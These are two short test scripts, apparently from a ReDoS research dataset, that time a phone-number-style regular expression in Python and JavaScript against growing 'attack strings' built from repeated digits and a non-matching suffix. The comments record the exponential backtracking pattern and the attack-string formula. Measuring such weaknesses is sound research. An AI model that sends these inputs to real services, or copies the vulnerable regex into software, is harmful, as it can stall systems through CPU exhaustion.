File: regexlib/python_re_test_file/regexlib_277.py
# 277
# (\+)?([-\._\(\) ]?[\d]{3,20}[-\._\(\) ]?){2,10}
# EXPONENT
# nums:4
# EXPONENT AttackString:"111111"+"111"*16+"◎@! _1_NQ"

import re
from time import perf_counter

regex = """(\+)?([-\._\(\) ]?[\d]{3,20}[-\._\(\) ]?){2,10}"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "111111" + "111" * i * 1 + "◎@! _1_NQ"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_277.js
/* 277
 * (\+)?([-\._\(\) ]?[\d]{3,20}[-\._\(\) ]?){2,10}
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:""+"000000"*8+"◎@! _1_NQ"
 */
var REGEX = /(\+)?([-\._\(\) ]?[\d]{3,20}[-\._\(\) ]?){2,10}/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '000000'.repeat(i*1) + '◎@! _1_NQ'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}